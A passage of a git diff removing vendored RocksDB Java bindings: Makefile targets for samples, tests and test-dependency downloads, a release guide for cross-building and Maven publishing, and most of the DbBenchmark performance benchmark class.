-	$(AM_V_at)@rm -rf /tmp/rocksdbjni_not_found
-	java $(JAVA_ARGS) -Djava.library.path=target -cp $(MAIN_CLASSES):$(SAMPLES_MAIN_CLASSES) RocksDBSample /tmp/rocksdbjni
-	$(AM_V_at)@rm -rf /tmp/rocksdbjni
-	$(AM_V_at)@rm -rf /tmp/rocksdbjni_not_found
-
-column_family_sample: java
-	$(AM_V_GEN)mkdir -p $(SAMPLES_MAIN_CLASSES)
-	$(AM_V_at)javac $(JAVAC_ARGS) -cp $(MAIN_CLASSES) -d $(SAMPLES_MAIN_CLASSES) $(SAMPLES_MAIN_SRC)/RocksDBColumnFamilySample.java
-	$(AM_V_at)@rm -rf /tmp/rocksdbjni
-	java $(JAVA_ARGS) -Djava.library.path=target -cp $(MAIN_CLASSES):$(SAMPLES_MAIN_CLASSES) RocksDBColumnFamilySample /tmp/rocksdbjni
-	$(AM_V_at)@rm -rf /tmp/rocksdbjni
-
-resolve_test_deps:
-	test -d "$(JAVA_TEST_LIBDIR)" || mkdir -p "$(JAVA_TEST_LIBDIR)"
-	test -s "$(JAVA_JUNIT_JAR)" || cp $(MVN_LOCAL)/junit/junit/4.12/junit-4.12.jar $(JAVA_TEST_LIBDIR) || curl -k -L -o $(JAVA_JUNIT_JAR) $(SEARCH_REPO_URL)junit/junit/4.12/junit-4.12.jar
-	test -s "$(JAVA_HAMCR_JAR)" || cp $(MVN_LOCAL)/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.jar $(JAVA_TEST_LIBDIR) || curl -k -L -o $(JAVA_HAMCR_JAR) $(SEARCH_REPO_URL)org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.jar
-	test -s "$(JAVA_MOCKITO_JAR)" || cp $(MVN_LOCAL)/org/mockito/mockito-all/1.10.19/mockito-all-1.10.19.jar $(JAVA_TEST_LIBDIR) || curl -k -L -o "$(JAVA_MOCKITO_JAR)" $(SEARCH_REPO_URL)org/mockito/mockito-all/1.10.19/mockito-all-1.10.19.jar
-	test -s "$(JAVA_CGLIB_JAR)" || cp $(MVN_LOCAL)/cglib/cglib/2.2.2/cglib-2.2.2.jar $(JAVA_TEST_LIBDIR) || curl -k -L -o "$(JAVA_CGLIB_JAR)" $(SEARCH_REPO_URL)cglib/cglib/2.2.2/cglib-2.2.2.jar
-	test -s "$(JAVA_ASSERTJ_JAR)" || cp $(MVN_LOCAL)/org/assertj/assertj-core/1.7.1/assertj-core-1.7.1.jar $(JAVA_TEST_LIBDIR) || curl -k -L -o "$(JAVA_ASSERTJ_JAR)" $(CENTRAL_REPO_URL)org/assertj/assertj-core/1.7.1/assertj-core-1.7.1.jar
-
-java_test: java resolve_test_deps
-	$(AM_V_GEN)mkdir -p $(TEST_CLASSES)
-	$(AM_V_at)javac $(JAVAC_ARGS) -cp $(MAIN_CLASSES):$(JAVA_TESTCLASSPATH) -d $(TEST_CLASSES)\
-		$(TEST_SRC)/org/rocksdb/test/*.java\
-		$(TEST_SRC)/org/rocksdb/util/*.java\
-		$(TEST_SRC)/org/rocksdb/*.java
-	$(AM_V_at)javah -cp $(MAIN_CLASSES):$(TEST_CLASSES) -d $(NATIVE_INCLUDE) -jni $(NATIVE_JAVA_TEST_CLASSES)
-
-test: java java_test run_test
-
-run_test:
-	java $(JAVA_ARGS) -Djava.library.path=target -cp "$(MAIN_CLASSES):$(TEST_CLASSES):$(JAVA_TESTCLASSPATH):target/*" org.rocksdb.test.RocksJunitRunner $(JAVA_TESTS)
-
-db_bench: java
-	$(AM_V_GEN)mkdir -p $(BENCHMARK_MAIN_CLASSES)
-	$(AM_V_at)javac $(JAVAC_ARGS) -cp $(MAIN_CLASSES) -d $(BENCHMARK_MAIN_CLASSES) $(BENCHMARK_MAIN_SRC)/org/rocksdb/benchmark/*.java
diff --git a/thirdparty/rocksdb/java/RELEASE.md b/thirdparty/rocksdb/java/RELEASE.md
deleted file mode 100644
index cb9aaf9..0000000
--- a/thirdparty/rocksdb/java/RELEASE.md
+++ /dev/null
@@ -1,54 +0,0 @@
-## Cross-building
-
-RocksDB can be built as a single self contained cross-platform JAR. The cross-platform jar can be usd on any 64-bit OSX system, 32-bit Linux system, or 64-bit Linux system.
-
-Building a cross-platform JAR requires:
-
- * [Vagrant](https://www.vagrantup.com/)
- * [Virtualbox](https://www.virtualbox.org/)
- * A Mac OSX machine that can compile RocksDB.
- * Java 7 set as JAVA_HOME.
-
-Once you have these items, run this make command from RocksDB's root source directory:
-
-    make jclean clean rocksdbjavastaticrelease
-
-This command will build RocksDB natively on OSX, and will then spin up two Vagrant Virtualbox Ubuntu images to build RocksDB for both 32-bit and 64-bit Linux. 
-
-You can find all native binaries and JARs in the java/target directory upon completion:
-
-    librocksdbjni-linux32.so
-    librocksdbjni-linux64.so
-    librocksdbjni-osx.jnilib
-    rocksdbjni-3.5.0-javadoc.jar
-    rocksdbjni-3.5.0-linux32.jar
-    rocksdbjni-3.5.0-linux64.jar
-    rocksdbjni-3.5.0-osx.jar
-    rocksdbjni-3.5.0-sources.jar
-    rocksdbjni-3.5.0.jar
-
-## Maven publication
-
-Set ~/.m2/settings.xml to contain:
-
-    <settings xmlns="http://maven.apache.org/SETTINGS/1.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/SETTINGS/1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">
-      <servers>
-        <server>
-          <id>sonatype-nexus-staging</id>
-          <username>your-sonatype-jira-username</username>
-          <password>your-sonatype-jira-password</password>
-        </server>
-      </servers>
-    </settings>
-
-From RocksDB's root directory, first build the Java static JARs:
-
-    make jclean clean rocksdbjavastaticpublish
-
-This command will [stage the JAR artifacts on the Sonatype staging repository](http://central.sonatype.org/pages/manual-staging-bundle-creation-and-deployment.html). To release the staged artifacts.
-
-1. Go to [https://oss.sonatype.org/#stagingRepositories](https://oss.sonatype.org/#stagingRepositories) and search for "rocksdb" in the upper right hand search box.
-2. Select the rocksdb staging repository, and inspect its contents.
-3. If all is well, follow [these steps](https://oss.sonatype.org/#stagingRepositories) to close the repository and release it.
-
-After the release has occurred, the artifacts will be synced to Maven central within 24-48 hours.
diff --git a/thirdparty/rocksdb/java/benchmark/src/main/java/org/rocksdb/benchmark/DbBenchmark.java b/thirdparty/rocksdb/java/benchmark/src/main/java/org/rocksdb/benchmark/DbBenchmark.java
deleted file mode 100644
index 8af6d2e..0000000
--- a/thirdparty/rocksdb/java/benchmark/src/main/java/org/rocksdb/benchmark/DbBenchmark.java
+++ /dev/null
@@ -1,1648 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-/**
- * Copyright (C) 2011 the original author or authors.
- * See the notice.md file distributed with this work for additional
- * information regarding copyright ownership.
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- *     http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-package org.rocksdb.benchmark;
-
-import java.io.IOException;
-import java.lang.Runnable;
-import java.lang.Math;
-import java.io.File;
-import java.lang.reflect.Constructor;
-import java.lang.reflect.InvocationTargetException;
-import java.nio.ByteBuffer;
-import java.nio.file.Files;
-import java.util.Collection;
-import java.util.Date;
-import java.util.EnumMap;
-import java.util.List;
-import java.util.Map;
-import java.util.Random;
-import java.util.concurrent.TimeUnit;
-import java.util.Arrays;
-import java.util.ArrayList;
-import java.util.concurrent.Callable;
-import java.util.concurrent.Executors;
-import java.util.concurrent.ExecutorService;
-import java.util.concurrent.Future;
-import java.util.concurrent.TimeUnit;
-import org.rocksdb.*;
-import org.rocksdb.RocksMemEnv;
-import org.rocksdb.util.SizeUnit;
-
-class Stats {
-  int id_;
-  long start_;
-  long finish_;
-  double seconds_;
-  long done_;
-  long found_;
-  long lastOpTime_;
-  long nextReport_;
-  long bytes_;
-  StringBuilder message_;
-  boolean excludeFromMerge_;
-
-  // TODO(yhchiang): use the following arguments:
-  //   (Long)Flag.stats_interval
-  //   (Integer)Flag.stats_per_interval
-
-  Stats(int id) {
-    id_ = id;
-    nextReport_ = 100;
-    done_ = 0;
-    bytes_ = 0;
-    seconds_ = 0;
-    start_ = System.nanoTime();
-    lastOpTime_ = start_;
-    finish_ = start_;
-    found_ = 0;
-    message_ = new StringBuilder("");
-    excludeFromMerge_ = false;
-  }
-
-  void merge(final Stats other) {
-    if (other.excludeFromMerge_) {
-      return;
-    }
-
-    done_ += other.done_;
-    found_ += other.found_;
-    bytes_ += other.bytes_;
-    seconds_ += other.seconds_;
-    if (other.start_ < start_) start_ = other.start_;
-    if (other.finish_ > finish_) finish_ = other.finish_;
-
-    // Just keep the messages from one thread
-    if (message_.length() == 0) {
-      message_ = other.message_;
-    }
-  }
-
-  void stop() {
-    finish_ = System.nanoTime();
-    seconds_ = (double) (finish_ - start_) * 1e-9;
-  }
-
-  void addMessage(String msg) {
-    if (message_.length() > 0) {
-      message_.append(" ");
-    }
-    message_.append(msg);
-  }
-
-  void setId(int id) { id_ = id; }
-  void setExcludeFromMerge() { excludeFromMerge_ = true; }
-
-  void finishedSingleOp(int bytes) {
-    done_++;
-    lastOpTime_ = System.nanoTime();
-    bytes_ += bytes;
-    if (done_ >= nextReport_) {
-      if (nextReport_ < 1000) {
-        nextReport_ += 100;
-      } else if (nextReport_ < 5000) {
-        nextReport_ += 500;
-      } else if (nextReport_ < 10000) {
-        nextReport_ += 1000;
-      } else if (nextReport_ < 50000) {
-        nextReport_ += 5000;
-      } else if (nextReport_ < 100000) {
-        nextReport_ += 10000;
-      } else if (nextReport_ < 500000) {
-        nextReport_ += 50000;
-      } else {
-        nextReport_ += 100000;
-      }
-      System.err.printf("... Task %s finished %d ops%30s\r", id_, done_, "");
-    }
-  }
-
-  void report(String name) {
-    // Pretend at least one op was done in case we are running a benchmark
-    // that does not call FinishedSingleOp().
-    if (done_ < 1) done_ = 1;
-
-    StringBuilder extra = new StringBuilder("");
-    if (bytes_ > 0) {
-      // Rate is computed on actual elapsed time, not the sum of per-thread
-      // elapsed times.
-      double elapsed = (finish_ - start_) * 1e-9;
-      extra.append(String.format("%6.1f MB/s", (bytes_ / 1048576.0) / elapsed));
-    }
-    extra.append(message_.toString());
-    double elapsed = (finish_ - start_);
-    double throughput = (double) done_ / (elapsed * 1e-9);
-
-    System.out.format("%-12s : %11.3f micros/op %d ops/sec;%s%s\n",
-            name, (elapsed * 1e-6) / done_,
-            (long) throughput, (extra.length() == 0 ? "" : " "), extra.toString());
-  }
-}
-
-public class DbBenchmark {
-  enum Order {
-    SEQUENTIAL,
-    RANDOM
-  }
-
-  enum DBState {
-    FRESH,
-    EXISTING
-  }
-
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  abstract class BenchmarkTask implements Callable<Stats> {
-    // TODO(yhchiang): use (Integer)Flag.perf_level.
-    public BenchmarkTask(
-        int tid, long randSeed, long numEntries, long keyRange) {
-      tid_ = tid;
-      rand_ = new Random(randSeed + tid * 1000);
-      numEntries_ = numEntries;
-      keyRange_ = keyRange;
-      stats_ = new Stats(tid);
-    }
-
-    @Override public Stats call() throws RocksDBException {
-      stats_.start_ = System.nanoTime();
-      runTask();
-      stats_.finish_ = System.nanoTime();
-      return stats_;
-    }
-
-    abstract protected void runTask() throws RocksDBException;
-
-    protected int tid_;
-    protected Random rand_;
-    protected long numEntries_;
-    protected long keyRange_;
-    protected Stats stats_;
-
-    protected void getFixedKey(byte[] key, long sn) {
-      generateKeyFromLong(key, sn);
-    }
-
-    protected void getRandomKey(byte[] key, long range) {
-      generateKeyFromLong(key, Math.abs(rand_.nextLong() % range));
-    }
-  }
-
-  abstract class WriteTask extends BenchmarkTask {
-    public WriteTask(
-        int tid, long randSeed, long numEntries, long keyRange,
-        WriteOptions writeOpt, long entriesPerBatch) {
-      super(tid, randSeed, numEntries, keyRange);
-      writeOpt_ = writeOpt;
-      entriesPerBatch_ = entriesPerBatch;
-      maxWritesPerSecond_ = -1;
-    }
-
-    public WriteTask(
-        int tid, long randSeed, long numEntries, long keyRange,
-        WriteOptions writeOpt, long entriesPerBatch, long maxWritesPerSecond) {
-      super(tid, randSeed, numEntries, keyRange);
-      writeOpt_ = writeOpt;
-      entriesPerBatch_ = entriesPerBatch;
-      maxWritesPerSecond_ = maxWritesPerSecond;
-    }
-
-    @Override public void runTask() throws RocksDBException {
-      if (numEntries_ != DbBenchmark.this.num_) {
-        stats_.message_.append(String.format(" (%d ops)", numEntries_));
-      }
-      byte[] key = new byte[keySize_];
-      byte[] value = new byte[valueSize_];
-
-      try {
-        if (entriesPerBatch_ == 1) {
-          for (long i = 0; i < numEntries_; ++i) {
-            getKey(key, i, keyRange_);
-            DbBenchmark.this.gen_.generate(value);
-            db_.put(writeOpt_, key, value);
-            stats_.finishedSingleOp(keySize_ + valueSize_);
-            writeRateControl(i);
-            if (isFinished()) {
-              return;
-            }
-          }
-        } else {
-          for (long i = 0; i < numEntries_; i += entriesPerBatch_) {
-            WriteBatch batch = new WriteBatch();
-            for (long j = 0; j < entriesPerBatch_; j++) {
-              getKey(key, i + j, keyRange_);
-              DbBenchmark.this.gen_.generate(value);
-              batch.put(key, value);
-              stats_.finishedSingleOp(keySize_ + valueSize_);
-            }
-            db_.write(writeOpt_, batch);
-            batch.dispose();
-            writeRateControl(i);
-            if (isFinished()) {
-              return;
-            }
-          }
-        }
-      } catch (InterruptedException e) {
-        // thread has been terminated.
-      }
-    }
-
-    protected void writeRateControl(long writeCount)
-        throws InterruptedException {
-      if (maxWritesPerSecond_ <= 0) return;
-      long minInterval =
-          writeCount * TimeUnit.SECONDS.toNanos(1) / maxWritesPerSecond_;
-      long interval = System.nanoTime() - stats_.start_;
-      if (minInterval - interval > TimeUnit.MILLISECONDS.toNanos(1)) {
-        TimeUnit.NANOSECONDS.sleep(minInterval - interval);
-      }
-    }
-
-    abstract protected void getKey(byte[] key, long id, long range);
-    protected WriteOptions writeOpt_;
-    protected long entriesPerBatch_;
-    protected long maxWritesPerSecond_;
-  }
-
-  class WriteSequentialTask extends WriteTask {
-    public WriteSequentialTask(
-        int tid, long randSeed, long numEntries, long keyRange,
-        WriteOptions writeOpt, long entriesPerBatch) {
-      super(tid, randSeed, numEntries, keyRange,
-            writeOpt, entriesPerBatch);
-    }
-    public WriteSequentialTask(
-        int tid, long randSeed, long numEntries, long keyRange,
-        WriteOptions writeOpt, long entriesPerBatch,
-        long maxWritesPerSecond) {
-      super(tid, randSeed, numEntries, keyRange,
-            writeOpt, entriesPerBatch,
-            maxWritesPerSecond);
-    }
-    @Override protected void getKey(byte[] key, long id, long range) {
-      getFixedKey(key, id);
-    }
-  }
-
-  class WriteRandomTask extends WriteTask {
-    public WriteRandomTask(
-        int tid, long randSeed, long numEntries, long keyRange,
-        WriteOptions writeOpt, long entriesPerBatch) {
-      super(tid, randSeed, numEntries, keyRange,
-            writeOpt, entriesPerBatch);
-    }
-    public WriteRandomTask(
-        int tid, long randSeed, long numEntries, long keyRange,
-        WriteOptions writeOpt, long entriesPerBatch,
-        long maxWritesPerSecond) {
-      super(tid, randSeed, numEntries, keyRange,
-            writeOpt, entriesPerBatch,
-            maxWritesPerSecond);
-    }
-    @Override protected void getKey(byte[] key, long id, long range) {
-      getRandomKey(key, range);
-    }
-  }
-
-  class WriteUniqueRandomTask extends WriteTask {
-    static final int MAX_BUFFER_SIZE = 10000000;
-    public WriteUniqueRandomTask(
-        int tid, long randSeed, long numEntries, long keyRange,
-        WriteOptions writeOpt, long entriesPerBatch) {
-      super(tid, randSeed, numEntries, keyRange,
-            writeOpt, entriesPerBatch);
-      initRandomKeySequence();
-    }
-    public WriteUniqueRandomTask(
-        int tid, long randSeed, long numEntries, long keyRange,
-        WriteOptions writeOpt, long entriesPerBatch,
-        long maxWritesPerSecond) {
-      super(tid, randSeed, numEntries, keyRange,
-            writeOpt, entriesPerBatch,
-            maxWritesPerSecond);
-      initRandomKeySequence();
-    }
-    @Override protected void getKey(byte[] key, long id, long range) {
-      generateKeyFromLong(key, nextUniqueRandom());
-    }
-
-    protected void initRandomKeySequence() {
-      bufferSize_ = MAX_BUFFER_SIZE;
-      if (bufferSize_ > keyRange_) {
-        bufferSize_ = (int) keyRange_;
-      }
-      currentKeyCount_ = bufferSize_;
-      keyBuffer_ = new long[MAX_BUFFER_SIZE];
-      for (int k = 0; k < bufferSize_; ++k) {
-        keyBuffer_[k] = k;
-      }
-    }
-
-    /**
-     * Semi-randomly return the next unique key.  It is guaranteed to be
-     * fully random if keyRange_ <= MAX_BUFFER_SIZE.
-     */
-    long nextUniqueRandom() {
-      if (bufferSize_ == 0) {
-        System.err.println("bufferSize_ == 0.");
-        return 0;
-      }
-      int r = rand_.nextInt(bufferSize_);
-      // randomly pick one from the keyBuffer
-      long randKey = keyBuffer_[r];
-      if (currentKeyCount_ < keyRange_) {
-        // if we have not yet inserted all keys, insert next new key to [r].
-        keyBuffer_[r] = currentKeyCount_++;
-      } else {
-        // move the last element to [r] and decrease the size by 1.
-        keyBuffer_[r] = keyBuffer_[--bufferSize_];
-      }
-      return randKey;
-    }
-
-    int bufferSize_;
-    long currentKeyCount_;
-    long[] keyBuffer_;
-  }
-
-  class ReadRandomTask extends BenchmarkTask {
-    public ReadRandomTask(
-        int tid, long randSeed, long numEntries, long keyRange) {
-      super(tid, randSeed, numEntries, keyRange);
-    }
-    @Override public void runTask() throws RocksDBException {
-      byte[] key = new byte[keySize_];
-      byte[] value = new byte[valueSize_];
-      for (long i = 0; i < numEntries_; i++) {
-        getRandomKey(key, keyRange_);
-        int len = db_.get(key, value);
-        if (len != RocksDB.NOT_FOUND) {
-          stats_.found_++;
-          stats_.finishedSingleOp(keySize_ + valueSize_);
-        } else {
-          stats_.finishedSingleOp(keySize_);
-        }
-        if (isFinished()) {
-          return;
-        }
-      }
-    }
-  }
-
-  class ReadSequentialTask extends BenchmarkTask {
-    public ReadSequentialTask(
-        int tid, long randSeed, long numEntries, long keyRange) {
-      super(tid, randSeed, numEntries, keyRange);
-    }
-    @Override public void runTask() throws RocksDBException {
-      RocksIterator iter = db_.newIterator();
-      long i;
-      for (iter.seekToFirst(), i = 0;
-           iter.isValid() && i < numEntries_;
-           iter.next(), ++i) {
-        stats_.found_++;
-        stats_.finishedSingleOp(iter.key().length + iter.value().length);
-        if (isFinished()) {
-          iter.dispose();
-          return;
-        }
-      }
-      iter.dispose();
-    }
-  }
-
-  public DbBenchmark(Map<Flag, Object> flags) throws Exception {
-    benchmarks_ = (List<String>) flags.get(Flag.benchmarks);
-    num_ = (Integer) flags.get(Flag.num);
-    threadNum_ = (Integer) flags.get(Flag.threads);
-    reads_ = (Integer) (flags.get(Flag.reads) == null ?
-        flags.get(Flag.num) : flags.get(Flag.reads));
-    keySize_ = (Integer) flags.get(Flag.key_size);
-    valueSize_ = (Integer) flags.get(Flag.value_size);
-    compressionRatio_ = (Double) flags.get(Flag.compression_ratio);
-    useExisting_ = (Boolean) flags.get(Flag.use_existing_db);
-    randSeed_ = (Long) flags.get(Flag.seed);
-    databaseDir_ = (String) flags.get(Flag.db);
-    writesPerSeconds_ = (Integer) flags.get(Flag.writes_per_second);
-    memtable_ = (String) flags.get(Flag.memtablerep);
-    maxWriteBufferNumber_ = (Integer) flags.get(Flag.max_write_buffer_number);
-    prefixSize_ = (Integer) flags.get(Flag.prefix_size);
-    keysPerPrefix_ = (Integer) flags.get(Flag.keys_per_prefix);
-    hashBucketCount_ = (Long) flags.get(Flag.hash_bucket_count);
-    usePlainTable_ = (Boolean) flags.get(Flag.use_plain_table);
-    useMemenv_ = (Boolean) flags.get(Flag.use_mem_env);
-    flags_ = flags;
-    finishLock_ = new Object();
-    // options.setPrefixSize((Integer)flags_.get(Flag.prefix_size));
-    // options.setKeysPerPrefix((Long)flags_.get(Flag.keys_per_prefix));
-    compressionType_ = (String) flags.get(Flag.compression_type);
-    compression_ = CompressionType.NO_COMPRESSION;
-    try {
-      if (compressionType_!=null) {
-          final CompressionType compressionType =
-              CompressionType.getCompressionType(compressionType_);
-          if (compressionType != null &&
-              compressionType != CompressionType.NO_COMPRESSION) {
-            System.loadLibrary(compressionType.getLibraryName());
-          }
-
-      }
-    } catch (UnsatisfiedLinkError e) {
-      System.err.format("Unable to load %s library:%s%n" +
-                        "No compression is used.%n",
-          compressionType_, e.toString());
-      compressionType_ = "none";
-    }
-    gen_ = new RandomGenerator(randSeed_, compressionRatio_);
-  }
-
-  private void prepareReadOptions(ReadOptions options) {
-    options.setVerifyChecksums((Boolean)flags_.get(Flag.verify_checksum));
-    options.setTailing((Boolean)flags_.get(Flag.use_tailing_iterator));
-  }
-
-  private void prepareWriteOptions(WriteOptions options) {
-    options.setSync((Boolean)flags_.get(Flag.sync));
-    options.setDisableWAL((Boolean)flags_.get(Flag.disable_wal));
-  }
-
-  private void prepareOptions(Options options) throws RocksDBException {
-    if (!useExisting_) {
-      options.setCreateIfMissing(true);
-    } else {
-      options.setCreateIfMissing(false);
-    }
-    if (useMemenv_) {
-      options.setEnv(new RocksMemEnv());
-    }
-    switch (memtable_) {
-      case "skip_list":
-        options.setMemTableConfig(new SkipListMemTableConfig());
-        break;
-      case "vector":
-        options.setMemTableConfig(new VectorMemTableConfig());
-        break;
-      case "hash_linkedlist":
-        options.setMemTableConfig(
-            new HashLinkedListMemTableConfig()
-                .setBucketCount(hashBucketCount_));
-        options.useFixedLengthPrefixExtractor(prefixSize_);
-        break;
-      case "hash_skiplist":
-      case "prefix_hash":
-        options.setMemTableConfig(
-            new HashSkipListMemTableConfig()
-                .setBucketCount(hashBucketCount_));
-        options.useFixedLengthPrefixExtractor(prefixSize_);
-        break;
-      default:
-        System.err.format(
-            "unable to detect the specified memtable, " +
-                "use the default memtable factory %s%n",
-            options.memTableFactoryName());
-        break;
-    }
-    if (usePlainTable_) {
-      options.setTableFormatConfig(
-          new PlainTableConfig().setKeySize(keySize_));
-    } else {
-      BlockBasedTableConfig table_options = new BlockBasedTableConfig();
-      table_options.setBlockSize((Long)flags_.get(Flag.block_size))
-                   .setBlockCacheSize((Long)flags_.get(Flag.cache_size))
-                   .setCacheNumShardBits(
-                      (Integer)flags_.get(Flag.cache_numshardbits));
-      options.setTableFormatConfig(table_options);
-    }
-    options.setWriteBufferSize(
-        (Long)flags_.get(Flag.write_buffer_size));
-    options.setMaxWriteBufferNumber(
-        (Integer)flags_.get(Flag.max_write_buffer_number));
-    options.setMaxBackgroundCompactions(
-        (Integer)flags_.get(Flag.max_background_compactions));
-    options.getEnv().setBackgroundThreads(
-        (Integer)flags_.get(Flag.max_background_compactions));
-    options.setMaxBackgroundFlushes(
-        (Integer)flags_.get(Flag.max_background_flushes));
-    options.setMaxOpenFiles(
-        (Integer)flags_.get(Flag.open_files));
-    options.setUseFsync(
-        (Boolean)flags_.get(Flag.use_fsync));
-    options.setWalDir(
-        (String)flags_.get(Flag.wal_dir));
-    options.setDeleteObsoleteFilesPeriodMicros(
-        (Integer)flags_.get(Flag.delete_obsolete_files_period_micros));
-    options.setTableCacheNumshardbits(
-        (Integer)flags_.get(Flag.table_cache_numshardbits));
-    options.setAllowMmapReads(
-        (Boolean)flags_.get(Flag.mmap_read));
-    options.setAllowMmapWrites(
-        (Boolean)flags_.get(Flag.mmap_write));
-    options.setAdviseRandomOnOpen(
-        (Boolean)flags_.get(Flag.advise_random_on_open));
-    options.setUseAdaptiveMutex(
-        (Boolean)flags_.get(Flag.use_adaptive_mutex));
-    options.setBytesPerSync(
-        (Long)flags_.get(Flag.bytes_per_sync));
-    options.setBloomLocality(
-        (Integer)flags_.get(Flag.bloom_locality));
-    options.setMinWriteBufferNumberToMerge(
-        (Integer)flags_.get(Flag.min_write_buffer_number_to_merge));
-    options.setMemtablePrefixBloomSizeRatio((Double) flags_.get(Flag.memtable_bloom_size_ratio));
-    options.setNumLevels(
-        (Integer)flags_.get(Flag.num_levels));
-    options.setTargetFileSizeBase(
-        (Integer)flags_.get(Flag.target_file_size_base));
-    options.setTargetFileSizeMultiplier((Integer)flags_.get(Flag.target_file_size_multiplier));
-    options.setMaxBytesForLevelBase(
-        (Integer)flags_.get(Flag.max_bytes_for_level_base));
-    options.setMaxBytesForLevelMultiplier((Double) flags_.get(Flag.max_bytes_for_level_multiplier));
-    options.setLevelZeroStopWritesTrigger(
-        (Integer)flags_.get(Flag.level0_stop_writes_trigger));
-    options.setLevelZeroSlowdownWritesTrigger(
-        (Integer)flags_.get(Flag.level0_slowdown_writes_trigger));
-    options.setLevelZeroFileNumCompactionTrigger(
-        (Integer)flags_.get(Flag.level0_file_num_compaction_trigger));
-    options.setMaxCompactionBytes(
-        (Long) flags_.get(Flag.max_compaction_bytes));
-    options.setDisableAutoCompactions(
-        (Boolean)flags_.get(Flag.disable_auto_compactions));
-    options.setMaxSuccessiveMerges(
-        (Integer)flags_.get(Flag.max_successive_merges));
-    options.setWalTtlSeconds((Long)flags_.get(Flag.wal_ttl_seconds));
-    options.setWalSizeLimitMB((Long)flags_.get(Flag.wal_size_limit_MB));
-    if(flags_.get(Flag.java_comparator) != null) {
-      options.setComparator(
-          (AbstractComparator)flags_.get(Flag.java_comparator));
-    }
-
-    /* TODO(yhchiang): enable the following parameters
-    options.setCompressionType((String)flags_.get(Flag.compression_type));
-    options.setCompressionLevel((Integer)flags_.get(Flag.compression_level));
-    options.setMinLevelToCompress((Integer)flags_.get(Flag.min_level_to_compress));
-    options.setHdfs((String)flags_.get(Flag.hdfs)); // env
-    options.setStatistics((Boolean)flags_.get(Flag.statistics));
-    options.setUniversalSizeRatio(
-        (Integer)flags_.get(Flag.universal_size_ratio));
-    options.setUniversalMinMergeWidth(
-        (Integer)flags_.get(Flag.universal_min_merge_width));
-    options.setUniversalMaxMergeWidth(
-        (Integer)flags_.get(Flag.universal_max_merge_width));
-    options.setUniversalMaxSizeAmplificationPercent(
-        (Integer)flags_.get(Flag.universal_max_size_amplification_percent));
-    options.setUniversalCompressionSizePercent(
-        (Integer)flags_.get(Flag.universal_compression_size_percent));
-    // TODO(yhchiang): add RocksDB.openForReadOnly() to enable Flag.readonly
-    // TODO(yhchiang): enable Flag.merge_operator by switch
-    options.setAccessHintOnCompactionStart(
-        (String)flags_.get(Flag.compaction_fadvice));
-    // available values of fadvice are "NONE", "NORMAL", "SEQUENTIAL", "WILLNEED" for fadvice
-    */
-  }
-
-  private void run() throws RocksDBException {
-    if (!useExisting_) {
-      destroyDb();
-    }
-    Options options = new Options();
-    prepareOptions(options);
-    open(options);
-
-    printHeader(options);
-
-    for (String benchmark : benchmarks_) {
-      List<Callable<Stats>> tasks = new ArrayList<Callable<Stats>>();
-      List<Callable<Stats>> bgTasks = new ArrayList<Callable<Stats>>();
-      WriteOptions writeOpt = new WriteOptions();
-      prepareWriteOptions(writeOpt);
-      ReadOptions readOpt = new ReadOptions();
-      prepareReadOptions(readOpt);
-      int currentTaskId = 0;
-      boolean known = true;
-
-      switch (benchmark) {
-        case "fillseq":
-          tasks.add(new WriteSequentialTask(
-              currentTaskId++, randSeed_, num_, num_, writeOpt, 1));
-          break;
-        case "fillbatch":
-          tasks.add(new WriteRandomTask(
-              currentTaskId++, randSeed_, num_ / 1000, num_, writeOpt, 1000));
-          break;
-        case "fillrandom":
-          tasks.add(new WriteRandomTask(
-              currentTaskId++, randSeed_, num_, num_, writeOpt, 1));
-          break;
-        case "filluniquerandom":
-          tasks.add(new WriteUniqueRandomTask(
-              currentTaskId++, randSeed_, num_, num_, writeOpt, 1));
-          break;
-        case "fillsync":
-          writeOpt.setSync(true);
-          tasks.add(new WriteRandomTask(
-              currentTaskId++, randSeed_, num_ / 1000, num_ / 1000,
-              writeOpt, 1));
-          break;
-        case "readseq":
-          for (int t = 0; t < threadNum_; ++t) {
-            tasks.add(new ReadSequentialTask(
-                currentTaskId++, randSeed_, reads_ / threadNum_, num_));
-          }
-          break;
-        case "readrandom":
-          for (int t = 0; t < threadNum_; ++t) {
-            tasks.add(new ReadRandomTask(
-                currentTaskId++, randSeed_, reads_ / threadNum_, num_));
-          }
-          break;
-        case "readwhilewriting":
-          WriteTask writeTask = new WriteRandomTask(
-              -1, randSeed_, Long.MAX_VALUE, num_, writeOpt, 1, writesPerSeconds_);
-          writeTask.stats_.setExcludeFromMerge();
-          bgTasks.add(writeTask);
-          for (int t = 0; t < threadNum_; ++t) {
-            tasks.add(new ReadRandomTask(
-                currentTaskId++, randSeed_, reads_ / threadNum_, num_));
-          }
-          break;
-        case "readhot":
-          for (int t = 0; t < threadNum_; ++t) {
-            tasks.add(new ReadRandomTask(
-                currentTaskId++, randSeed_, reads_ / threadNum_, num_ / 100));
-          }
-          break;
-        case "delete":
-          destroyDb();
-          open(options);
-          break;
-        default:
-          known = false;
-          System.err.println("Unknown benchmark: " + benchmark);
-          break;
-      }
-      if (known) {
-        ExecutorService executor = Executors.newCachedThreadPool();
-        ExecutorService bgExecutor = Executors.newCachedThreadPool();
-        try {
-          // measure only the main executor time
-          List<Future<Stats>> bgResults = new ArrayList<Future<Stats>>();
-          for (Callable bgTask : bgTasks) {
-            bgResults.add(bgExecutor.submit(bgTask));
-          }
-          start();
-          List<Future<Stats>> results = executor.invokeAll(tasks);
-          executor.shutdown();
-          boolean finished = executor.awaitTermination(10, TimeUnit.SECONDS);
-          if (!finished) {
-            System.out.format(
-                "Benchmark %s was not finished before timeout.",
-                benchmark);
